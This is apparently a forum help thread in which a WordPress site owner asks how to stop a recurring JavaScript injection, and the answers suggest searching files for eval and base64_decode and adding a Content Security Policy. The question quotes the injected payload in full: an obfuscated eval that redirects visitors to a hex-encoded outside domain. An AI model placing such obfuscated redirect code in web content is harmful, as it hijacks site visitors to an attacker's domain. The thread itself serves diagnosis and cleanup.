Wordpress上的Javascript注入预防

Question

My blog on wordpress gets the following malicious script injected:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.5.4="6://%1%0%0%9%2%8%7%1%2/";',10,10,'78|6F|6D|window|href|location|http|63|2E|74'.split('|'),0,{}))

It navigates to:

• http://oxxtm.com/ which redirects to:
  • http://www.html5website.com/

I have already disabled a few plugins, but it seems like the problem is somewhere else, for I'm using the following plugins and they seem to have a good reputation:

• Akismet
• Captcha on Login
• Free & Simple Contact Form Plugin - PirateForms (it is recommended by my Zerif Lite theme)
• SMTP Mailer
• WooCommerce

If I can't find the rootcause, would you recomend handling the "redirect" event to keep the site running? If so how could I handle if there is a redirect pointing to http://oxxtm.com/ and abort it using javascript?

I tried using the onunload and onbeforeunload events but it seems like the injected eval , runs before the event manipulation is even registered.

I can see that it gets injected on different PHP pages (sometimes only one sometimes more) in wordpress and I don't know if there is a common PHP file in which I could include a script to prevent the action of this malicious script.

I already removed the malicious script several times, but it gets injected again & again. I need to treat the symptom while I search for the cause or the site will be out of service. However, I don't understand how the script is injected in the first place.

Answer 1

Search with in all your files the following content: eval(function()

It will show you every files that contains this code.

Otherwise, try to search this: base64_decode

This is a function that permit to decode a base64-encoded text, which is often used by malicious PHP files to inject some code that you can't detect by searching eval(

If the problem persists, answer here and I'll try to help you.

Answer 2

Also, as additional feature to protect your client-side from XSS like that, i can suggest you to use CSP after cleaning your backend from injection. You can read more about it: https://developer.mozilla.org/en/docs/Web/Security/CSP It's not a silver-bullet, but nice to have it for protection of users.